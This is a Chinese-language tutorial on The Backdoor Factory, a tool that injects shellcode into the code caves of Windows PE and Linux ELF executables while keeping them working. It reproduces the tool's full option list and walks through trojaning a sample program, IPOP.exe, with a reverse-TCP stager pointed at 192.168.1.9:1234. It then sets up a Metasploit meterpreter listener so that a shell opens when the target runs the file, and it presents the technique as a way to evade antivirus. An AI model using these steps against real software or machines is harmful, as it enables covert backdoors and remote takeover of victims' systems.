0x00 前言

参考Micro8系列第九课:https://micro8.gitbook.io/micro8/contents-1/1-10/9-gong-ju-jie-shao-thebackdoorfactory

0x01 简介

The Backdoor Factory即后门工厂,是一款简单实用的后门构造工具,支持Windows PE和Linux ELF两种运行机制的可执行文件,目前来说免杀效果一般。

BDF的目标是实用用户所需的shell代码对可执行二进制文件进行补丁,并继续正常执行预补丁状态。

利用该工具,用户可以在不破坏原有可执行文件的功能的前提下,在文件的代码空隙中插入恶意代码Shellcode。当可执行文件被执行后,就可以触发恶意代码。BDF不仅提供常用的脚本,还允许嵌入其他工具生成的Shellcode,如Metasploit。

工具特点:

  • 目标文件会被拷贝并且打上补丁
  • 注入反弹脚本
  • 修改PE/COFF头以为所有的WIN32 DLL增加附加选项

Kali官网中的介绍:https://tools.kali.org/exploitation-tools/backdoor-factory

工具地址:https://github.com/secretsquirrel/the-backdoor-factory

注意:Kali默认预装的BDF是有问题的,需要从GitHub下载才行。

0x02 基本原理

可执行二进制文件中有大量的00,这些00是不包含数据的即无意义的,那么就可以将这些数据替换成payload,并且在程序执行的时候,JMP到代码段来触发payload。

利用其patch方式的编码加密技术,可以轻松的生成Win32 PE后门程序,从而帮助我们绕过一些防病毒软件的查杀,达到一定得免杀效果。

0x03 基本用法

下载BDF:

1
git clone https://github.com/secretsquirrel/the-backdoor-factory.git

查看参数说明:./backdoor.py -h

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
Usage: backdoor.py [options]

Options:
  -h, --help            show this help message and exit
  -f FILE, --file=FILE  File to backdoor
  -s SHELL, --shell=SHELL
                        Payloads that are available for use. Use 'show' to see
                        payloads.
  -H HOST, --hostip=HOST
                        IP of the C2 for reverse connections.
  -P PORT, --port=PORT  The port to either connect back to for reverse shells
                        or to listen on for bind shells
  -J, --cave_jumping    Select this options if you want to use code cave
                        jumping to further hide your shellcode in the binary.
  -a, --add_new_section
                        Mandating that a new section be added to the exe
                        (better success) but less av avoidance
  -U SUPPLIED_SHELLCODE, --user_shellcode=SUPPLIED_SHELLCODE
                        User supplied shellcode, make sure that it matches the
                        architecture that you are targeting.
  -c, --cave            The cave flag will find code caves that can be used
                        for stashing shellcode. This will print to all the
                        code caves of a specific size.The -l flag can be use
                        with this setting.
  -l SHELL_LEN, --shell_length=SHELL_LEN
                        For use with -c to help find code caves of different
                        sizes
  -o OUTPUT, --output-file=OUTPUT
                        The backdoor output file
  -n NSECTION, --section=NSECTION
                        New section name must be less than seven characters
  -d DIR, --directory=DIR
                        This is the location of the files that you want to
                        backdoor. You can make a directory of file backdooring
                        faster by forcing the attaching of a codecave to the
                        exe by using the -a setting.
  -w, --change_access   This flag changes the section that houses the codecave
                        to RWE. Sometimes this is necessary. Enabled by
                        default. If disabled, the backdoor may fail.
  -i, --injector        This command turns the backdoor factory in a hunt and
                        shellcode inject type of mechanism. Edit the target
                        settings in the injector module.
  -u SUFFIX, --suffix=SUFFIX
                        For use with injector, places a suffix on the original
                        file for easy recovery
  -D, --delete_original
                        For use with injector module.  This command deletes
                        the original file.  Not for use in production systems.
                        *Author not responsible for stupid uses.*
  -O DISK_OFFSET, --disk_offset=DISK_OFFSET
                        Starting point on disk offset, in bytes. Some authors
                        want to obfuscate their on disk offset to avoid
                        reverse engineering, if you find one of those files
                        use this flag, after you find the offset.
  -S, --support_check   To determine if the file is supported by BDF prior to
                        backdooring the file. For use by itself or with
                        verbose. This check happens automatically if the
                        backdooring is attempted.
  -M, --cave-miner      Future use, to help determine smallest shellcode
                        possible in a PE file
  -q, --no_banner       Kills the banner.
  -v, --verbose         For debug information output.
  -T IMAGE_TYPE, --image-type=IMAGE_TYPE
                        ALL, x86, or x64 type binaries only. Default=ALL
  -Z, --zero_cert       Allows for the overwriting of the pointer to the PE
                        certificate table effectively removing the certificate
                        from the binary for all intents and purposes.
  -R, --runas_admin     EXPERIMENTAL Checks the PE binaries for
                        'requestedExecutionLevel level="highestAvailable"'. If
                        this string is included in the binary, it must run as
                        system/admin. If not in Support Check mode it will
                        attmept to patch highestAvailable into the manifest if
                        requestedExecutionLevel entry exists.
  -L, --patch_dll       Use this setting if you DON'T want to patch DLLs.
                        Patches by default.
  -F FAT_PRIORITY, --fat_priority=FAT_PRIORITY
                        For MACH-O format. If fat file, focus on which arch to
                        patch. Default is x64. To force x86 use -F x86, to
                        force both archs use -F ALL.
  -B BEACON, --beacon=BEACON
                        For payloads that have the ability to beacon out, set
                        the time in secs
  -m PATCH_METHOD, --patch-method=PATCH_METHOD
                        Patching methods for PE files, 'manual','automatic',
                        replace and onionduke
  -b SUPPLIED_BINARY, --user_malware=SUPPLIED_BINARY
                        For onionduke. Provide your desired binary.
  -X, --xp_mode         Default: DO NOT support for XP legacy machines, use -X
                        to support XP. By default the binary will crash on XP
                        machines (e.g. sandboxes)
  -A, --idt_in_cave     EXPERIMENTAL By default a new Import Directory Table
                        is created in a new section, by calling this flag it
                        will be put in a code cave.  This can cause bianry
                        failure is some cases. Test on target binaries first.
  -C, --code_sign       For those with codesigning certs wishing to sign PE
                        binaries only. Name your signing key and private key
                        signingcert.cer and signingPrivateKey.pem repectively
                        in the certs directory it's up to you to obtain
                        signing certs.
  -p, --preprocess      To execute preprocessing scripts in the preprocess
                        directory

检测是否支持后门植入,这里以IPOP.exe为例:

1
./backdoor.py -f ~/IPOP.exe -S

测试裂缝空间size 150:

1
./backdoor.py -f ~/IPOP.exe -c -l 150

查看可用payload:

1
./backdoor.py -f ~/IPOP.exe -s show

插入payload,并生成文件:

1
./backdoor.py -f ~/IPOP.exe -H 192.168.1.9 -P 1234 -s iat_reverse_tcp_stager_threaded

对比原文件与生成文件MD5值:

1
md5sum ~/IPOP.exe ./backdoored/IPOP.exe

对比原文件与生成文件大小:

1
du -k ~/IPOP.exe ./backdoored/IPOP.exe

在msf中开启本地监听:

1
2
3
4
5
6
7
8
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.1.9
lhost => 192.168.1.9
msf exploit(handler) > set lport 1234
lport => 1234
msf exploit(handler) > exploit -j

当目标机器打开BDF加后门之后的IPOP.exe软件后,就能获取到反弹shell。